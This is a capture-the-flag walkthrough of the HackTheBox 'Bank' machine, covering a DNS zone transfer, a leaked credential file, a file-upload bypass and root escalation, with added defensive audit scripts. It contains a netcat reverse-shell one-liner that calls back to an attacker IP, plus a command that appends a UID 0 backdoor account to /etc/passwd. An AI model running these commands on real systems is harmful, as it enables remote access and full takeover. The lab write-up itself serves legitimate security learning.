Summary

Bank is an easy Linux box. It can be exploited by enumerating DNS and finding a new subdomain, which forwards to a login page. Brute-forcing this domain for directories turned up a directory with a large number of sensitive files containing encrypted emails and passwords; one of the files held plaintext credentials, which was found with grep. With those credentials you get access to a support page where you can create a ticket and bypass the file upload restrictions. Root privileges were obtained by writing a new user to the passwd file, which was world-writable.


Discovery

Started off by running NmapAutomator.
Nmap discovered the following open ports and services:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Subdomain Discovery

The interesting port is 53. DNS can be enumerated by performing a zone transfer. For this to work you first have to guess the domain; as you probably guessed, this is bank.htb:

jeroen@kali:~/htb/bank$ dig axfr bank.htb @10.129.29.200 

;  DiG 9.16.11-Debian axfr bank.htb @10.129.29.200
;; global options: +cmd
bank.htb.		604800	IN	SOA	bank.htb. chris.bank.htb. 6 604800 86400 2419200 604800
bank.htb.		604800	IN	NS	ns.bank.htb.
bank.htb.		604800	IN	A	10.129.29.200
ns.bank.htb.		604800	IN	A	10.129.29.200
www.bank.htb.		604800	IN	CNAME	bank.htb.
bank.htb.		604800	IN	SOA	bank.htb. chris.bank.htb. 6 604800 86400 2419200 604800
;; Query time: 12 msec
;; SERVER: 10.129.29.200#53(10.129.29.200)
;; WHEN: Mon Feb 22 15:25:02 CET 2021
;; XFR size: 6 records (messages 1, bytes 171)
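To make the transfer output easier to work with, here is an added example (my own code, not part of the original writeup) that parses the dig axfr output shown above into records, lists every hostname the zone exposes, and decodes the SOA contact mailbox. The sample text is the transfer above, embedded verbatim as constructed input; the function and variable names are my own. A defender can run the same parser against their own zones to see exactly what an open transfer hands out.

```python
import re

# Constructed sample: the dig axfr output shown above, with tabs as dig prints them.
SAMPLE_AXFR = """\
;  DiG 9.16.11-Debian axfr bank.htb @10.129.29.200
;; global options: +cmd
bank.htb.\t\t604800\tIN\tSOA\tbank.htb. chris.bank.htb. 6 604800 86400 2419200 604800
bank.htb.\t\t604800\tIN\tNS\tns.bank.htb.
bank.htb.\t\t604800\tIN\tA\t10.129.29.200
ns.bank.htb.\t\t604800\tIN\tA\t10.129.29.200
www.bank.htb.\t\t604800\tIN\tCNAME\tbank.htb.
bank.htb.\t\t604800\tIN\tSOA\tbank.htb. chris.bank.htb. 6 604800 86400 2419200 604800
;; Query time: 12 msec
;; SERVER: 10.129.29.200#53(10.129.29.200)
"""

# owner  ttl  IN  type  rdata   (dig separates the columns with tabs or spaces)
RECORD_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(.*)$")


def parse_axfr(text):
    """Return a list of (owner, ttl, rtype, rdata) tuples from dig axfr output.

    Comment lines (starting with ';') and blank lines are skipped. A transfer
    starts and ends with the same SOA record, so exact duplicates are dropped.
    """
    records = []
    seen = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RECORD_RE.match(line)
        if not m:
            continue
        owner, ttl, rtype, rdata = m.group(1), int(m.group(2)), m.group(3), m.group(4).strip()
        key = (owner, rtype, rdata)
        if key in seen:
            continue
        seen.add(key)
        records.append((owner, ttl, rtype, rdata))
    return records


def hostnames(records):
    """Every hostname the zone reveals: owner names plus NS/CNAME/SOA targets."""
    names = set()
    for owner, _ttl, rtype, rdata in records:
        names.add(owner.rstrip("."))
        if rtype in ("NS", "CNAME"):
            names.add(rdata.rstrip("."))
        elif rtype == "SOA":
            names.add(rdata.split()[0].rstrip("."))  # MNAME: primary name server
    return sorted(names)


def soa_contact(records):
    """Decode the SOA RNAME field: its first label is the mailbox local part.

    Simplification: escaped dots in the local part (e.g. john\\.doe) are not handled.
    Returns None when the zone has no SOA record.
    """
    for _owner, _ttl, rtype, rdata in records:
        if rtype == "SOA":
            rname = rdata.split()[1].rstrip(".")
            local, _, domain = rname.partition(".")
            return f"{local}@{domain}"
    return None


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    print("hostnames:", hostnames(recs))
    print("zone contact:", soa_contact(recs))
```

Note that the SOA record alone already leaks the administrator mailbox (chris@bank.htb), which is the same user whose credentials turn up later in the walkthrough. Zone transfers should be restricted to secondary servers; this parser is a quick way to see what yours hands out if they are not.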

The output reveals several new hostnames (ns.bank.htb and www.bank.htb). You can also scan for subdomains with WFUZZ:

wfuzz -u http://10.10.10.29/ -H "Host: FUZZ.bank.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hh 11510

However, no subdomains were found. Navigating to bank.htb led to a login page. It was not vulnerable to SQL injection, so I brute-forced this domain for directories (dir-dir is my alias for gobuster with directory-list-2.3-medium.txt):

dir-dir -u http://bank.htb/ -o login-dir-dir --wildcard -x php

It found the following directories:

http://bank.htb/login.php (Status: 200)
http://bank.htb/uploads (Status: 301)
http://bank.htb/support.php (Status: 302)
http://bank.htb/assets (Status: 301)
http://bank.htb/index.php (Status: 302)
http://bank.htb/logout.php (Status: 302)
http://bank.htb/inc (Status: 301)
http://bank.htb/server-status (Status: 403)
http://bank.htb/balance-transfer (Status: 301)

The directory balance-transfer is of interest. It contains a lot of files:

The files look as follows:

++OK ENCRYPT SUCCESS
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: WSO99GxdMW3WYxJwPIEqJHyt5UEAxnKtfyDpfaC16GY5dIB3rgtaY1E3WjDtGnWWWAlcKYdREbWSUxVlNpvLraPnttQaRN6Onr08pdZ4pWWjuREhha3IlT5OmVYdJ416
Email: w1fWfe1EbXYFPDX6N1O8UTXhPWuz1wGxyVuNavsltq0i3YpRZe0T8YaXUFxVcdtK8Xyit0EWrFfuDFmCTmw1kGYfmwayJDjRBRa5SP2juhO7WaJPxfRSWQ7jmhS5VbXw
Password: 38CVXEerW3zSdjILzzDvpKPL1HRXTOuXW6TUK8mGbVzoei9NSNjhx83zQVwKJ1IG7BBSJXzUS8j7qtUjgeAOnEnezUZjVH03iBV1zuWsDfz4IunZIYN6Cakc5jw00w3i
CreditCards: 0
Transactions: 149
Balance: 3301234 .
===UserAccount===

Notice the top line: these were encoded with MD5, which gives you a valid hash; however, John was unable to crack it.

Credential Discovery

At this point I was stuck for a while, but noticed that one of the files was different. In these cases you always want to look for unique files. As illustrated in the picture, almost all of them had a size of 58x, so let's filter for that:

curl http://bank.htb/balance-transfer/ | grep -v "58"

This fetches the directory index and drops every line that contains 58 (the file size of most files). You are left with one file; let's curl that:
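The grep -v "58" trick works here but is fragile: it also drops any line whose filename or timestamp happens to contain "58", and it only finds files that differ in exactly that way. As an added example (my own code, not from the original writeup), here is a small parser for an Apache mod_autoindex page that extracts each file's size and flags the files whose size is far from the median. The HTML is a constructed sample of the listing: five made-up 58x-byte filenames plus the oddly sized file named in the walkthrough, whose 257-byte size is invented for the example. The same idea generalizes to any directory index: outliers in size, date or name are where the hand-edited or failed entries tend to be.

```python
import re
import statistics

# Constructed sample of an Apache autoindex listing for /balance-transfer/.
# The five 58x-byte names are made up; the last file name is the one from the
# walkthrough, with a constructed size so that it stands out.
SAMPLE_INDEX = """\
<html><head><title>Index of /balance-transfer</title></head><body>
<h1>Index of /balance-transfer</h1>
<table>
<tr><th valign="top">&nbsp;</th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th></tr>
<tr><th colspan="4"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="0a1b2c3d4e5f60718293a4b5c6d7e8f9.acc">0a1b2c3d4e5f60718293a4b5c6d7e8f9.acc</a></td><td align="right">2017-06-14 14:12  </td><td align="right"> 582 </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="1a1b2c3d4e5f60718293a4b5c6d7e8f9.acc">1a1b2c3d4e5f60718293a4b5c6d7e8f9.acc</a></td><td align="right">2017-06-14 14:12  </td><td align="right"> 584 </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="2a1b2c3d4e5f60718293a4b5c6d7e8f9.acc">2a1b2c3d4e5f60718293a4b5c6d7e8f9.acc</a></td><td align="right">2017-06-14 14:12  </td><td align="right"> 585 </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="3a1b2c3d4e5f60718293a4b5c6d7e8f9.acc">3a1b2c3d4e5f60718293a4b5c6d7e8f9.acc</a></td><td align="right">2017-06-14 14:12  </td><td align="right"> 583 </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="4a1b2c3d4e5f60718293a4b5c6d7e8f9.acc">4a1b2c3d4e5f60718293a4b5c6d7e8f9.acc</a></td><td align="right">2017-06-14 14:12  </td><td align="right"> 584 </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="68576f20e9732f1b2edc4df5b8533230.acc">68576f20e9732f1b2edc4df5b8533230.acc</a></td><td align="right">2017-06-14 14:12  </td><td align="right"> 257 </td></tr>
<tr><th colspan="4"><hr></th></tr>
</table></body></html>
"""

# File links: skip the sort links (start with '?') and the parent directory ('/').
NAME_RE = re.compile(r'<a href="([^"?/][^"]*)">')
# Size cell: a number with an optional K/M/G suffix. The date cell is also
# right-aligned but contains '-' and ':', so it cannot match as a whole cell.
SIZE_RE = re.compile(r'<td align="right">\s*(\d+(?:\.\d+)?)([KMG]?)\s*</td>')
UNITS = {"": 1, "K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}


def parse_size(number, unit=""):
    """Turn autoindex's '584' or '1.2K' into a byte count."""
    return int(float(number) * UNITS[unit])


def parse_autoindex(html):
    """Return {filename: size_in_bytes}; rows without a numeric size are skipped."""
    entries = {}
    for row in html.split("<tr>"):          # one table row per file
        name_m = NAME_RE.search(row)
        size_m = SIZE_RE.search(row)
        if not name_m or not size_m:
            continue
        entries[name_m.group(1)] = parse_size(size_m.group(1), size_m.group(2))
    return entries


def find_outliers(entries, tolerance=0.10):
    """Names of files whose size differs from the median by more than `tolerance` (a fraction)."""
    if not entries:
        return []
    median = statistics.median(entries.values())
    return sorted(name for name, size in entries.items() if abs(size - median) > tolerance * median)


if __name__ == "__main__":
    files = parse_autoindex(SAMPLE_INDEX)
    print(f"{len(files)} files, outliers: {find_outliers(files)}")
```

Against a live listing you would feed parse_autoindex the body returned by curl; the median-based rule then finds the odd file without you having to eyeball the sizes first.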

curl http://bank.htb/balance-transfer/68576f20e9732f1b2edc4df5b8533230.acc -o odd.txt

This contained plaintext credentials:

--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

You can log in with these credentials, which gives you this dashboard:

There's a subsection for support:

This offers a file upload. Here I was stuck for a bit as well: it filtered for images, and tricks such as running exiftool were not successful. It turns out there's a comment in the page source:

[DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG]

So you can simply upload a webshell or reverse shell; I tend to go for a webshell first to verify that it works. Make sure you change the file extension to .htb.

Let's use a reverse shell generator to produce some reverse shells and find out which ones work. The netcat one worked:
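The upload filter here fails for two independent reasons: it decides by file extension alone, and the server has been told to run a second extension (.htb) through the PHP handler. As an added example (my own code, not the box's upload handler), here is how an upload check that closes the first gap looks: an allowlist of image extensions, exactly one extension per filename, a magic-byte check so the content must match the extension, and a server-chosen storage name so the client-supplied name never touches the filesystem. The function names and the test inputs are my own. The second gap is an Apache configuration issue that no upload check can fix; the debug handler mapping .htb to PHP has to go, and the uploads directory should not be allowed to execute scripts at all.

```python
import os
import secrets

# Allowlisted image extensions and the leading bytes (magic numbers) each must start with.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def check_upload(filename, data):
    """Decide whether an uploaded file may be stored.

    Returns (True, ext) when the file passes every check, otherwise (False, reason).
    The checks are layered so that a renamed script (.htb), a double extension
    (shell.php.jpg) and a script named photo.jpg are each rejected on their own.
    """
    base = os.path.basename(filename.replace("\\", "/"))   # drop any directory part
    stem, sep, ext = base.rpartition(".")
    if not sep or not stem:
        return False, "filename must have exactly one extension"
    if "." in stem:
        return False, "multiple extensions are not allowed"
    ext = ext.lower()
    if ext not in MAGIC:
        return False, f"extension .{ext} is not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, f"content does not look like a .{ext} image"
    return True, ext


def safe_filename(ext):
    """Server-chosen name: 32 random hex characters plus the verified extension."""
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed inputs: a PHP snippet renamed to .htb, and a real-looking JPEG header.
    print(check_upload("shell.htb", b"<?php echo 1; ?>"))
    ok, ext = check_upload("photo.JPG", b"\xff\xd8\xff\xe0JFIF")
    print(ok, safe_filename(ext))
```

The magic-byte check is deliberately shallow: it stops a plain script renamed to .jpg, but a valid image with PHP appended is still an image. That is exactly why the handler configuration, not the filename check, is the control that ultimately decides whether an upload can run.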

nc -e /bin/sh 10.10.14.147 4444

Privilege Escalation

I always run linpeas first.

Method 1: Writable passwd

Linpeas found that the passwd file is world-writable. This is really bad and really easy to exploit. First, generate a password hash:

openssl passwd banaan
0Vi8hrkOsZt2g

Then add a new user entry with UID 0 (root) to passwd:

echo "banaan:0Vi8hrkOsZt2g:0:0:root:/root:/bin/bash" >> /etc/passwd

Now you can obtain a root shell with:

su banaan

root@bank:/tmp# whoami && id
root
uid=0(root) gid=0(root) groups=0(root)

Method 2: SUID

Linpeas also found this odd SUID file:

/var/htb/bin/emergency

When you run this you will get a root shell:

root@bank:~# /var/htb/bin/emergency
# id
uid=0(root) gid=0(root) groups=0(root)
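Both escalation paths leave footprints that are cheap to look for on any Linux host. As an added example (my own code, not from the writeup or from linpeas), the following audits /etc/passwd contents for the Method 1 backdoor, an extra UID 0 account and a password hash stored in passwd instead of shadow, and classifies file permission bits so that a group- or world-writable passwd (Method 1) and an unexpected setuid binary (Method 2) are both named. The sample passwd is constructed; its last line is the entry appended above. The function names are my own.

```python
import os
import stat

# Constructed sample /etc/passwd, ending with the entry the walkthrough appended.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
chris:x:1000:1000:Christos Christopoulos,,,:/home/chris:/bin/bash
banaan:0Vi8hrkOsZt2g:0:0:root:/root:/bin/bash
"""

# Password-field values that carry no hash: 'x' defers to /etc/shadow, the rest lock the account.
NO_HASH = {"x", "*", "!", "!!", ""}


def parse_passwd(text):
    """Split passwd lines into dicts; malformed lines are kept with a 'malformed' key."""
    users = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            users.append({"line": lineno, "malformed": line})
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        users.append({"line": lineno, "name": name, "pw": pw, "uid": int(uid),
                      "gid": gid, "home": home, "shell": shell})
    return users


def audit_passwd(text):
    """Return (severity, message) findings for the signs of a passwd-file backdoor."""
    findings = []
    seen = set()
    for u in parse_passwd(text):
        if "malformed" in u:
            findings.append(("MEDIUM", f"line {u['line']}: malformed entry {u['malformed']!r}"))
            continue
        if u["uid"] == 0 and u["name"] != "root":
            findings.append(("HIGH", f"line {u['line']}: extra UID 0 account '{u['name']}'"))
        if u["pw"] not in NO_HASH:
            findings.append(("HIGH", f"line {u['line']}: '{u['name']}' carries a password hash in passwd instead of shadow"))
        if u["name"] in seen:
            findings.append(("MEDIUM", f"line {u['line']}: duplicate user name '{u['name']}'"))
        seen.add(u["name"])
    return findings


def mode_flags(mode):
    """Name the permission bits that matter here: setuid, and write access beyond the owner."""
    flags = []
    if mode & stat.S_ISUID:
        flags.append("setuid")
    if mode & stat.S_IWGRP:
        flags.append("group-writable")
    if mode & stat.S_IWOTH:
        flags.append("world-writable")
    return flags


def audit_path(path):
    """Apply mode_flags to a real file: /etc/passwd should give [], and /var/htb/bin/emergency would give ['setuid']."""
    return mode_flags(os.stat(path).st_mode)


if __name__ == "__main__":
    for severity, message in audit_passwd(SAMPLE_PASSWD):
        print(severity, message)
    print("/etc/passwd:", audit_path("/etc/passwd"))
```

On a live system the passwd audit is a one-liner (audit_passwd(open("/etc/passwd").read())), and audit_path can be run over the output of a find for setuid files to confirm which ones are package-provided and which, like /var/htb/bin/emergency here, are not.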

Conclusion

This was a really fun box; I really enjoyed it. I liked the practice with bypassing file upload extension filters. I hope you learned something and enjoyed this writeup!